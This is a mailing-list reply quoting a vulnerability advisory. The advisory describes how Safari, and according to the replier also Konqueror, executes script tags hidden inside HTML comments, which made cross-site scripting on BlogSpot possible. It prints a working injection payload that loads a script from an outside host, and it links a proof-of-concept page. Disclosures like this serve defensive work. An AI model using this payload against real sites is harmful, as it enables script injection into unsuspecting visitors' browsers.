Jose Avila III wrote: > Overview: > > Safari on occasions may improperly parse the source of an HTML document, > which can lead to the execution of html tags within comments. This can > become dangerous when input filters allow html tags within comments, as > they will get parsed and executed under certain circumstances. > > Details: > > In some cases you can cause Apple’s Safari browser to execute code when > it should not be executed. In the following example everything within > the comment, in theory should never be executed; however, safari decides > to execute the script tag. > > <title>myblog<!--</title></head><body><script > src=http://beanfuzz.com/bean.js> --></title> > > Blogs hosted on BlogSpot.com have filter mechanisms for their input; > however, they will allow you to inject anything within comments. This > made it possible to cross site script blogspot.com. Note: Only Safari > viewers will be affected. > > Proof of concept: http://dirtybean1234.blogspot.com/ > > Initial release of vulnerability: http://www.beanfuzz.com/wordpress/?p=99 > > Vendor Response: > > I was unable to get a response from the vendor in regards to this issue > > Questions / Comments: > Jose (at) onzra (dot) com > As could be expected, the same problem exists in Konqueror (tested v.3.5.5 on Debian GNU/Linux Sid). regards, Robert Tasarz
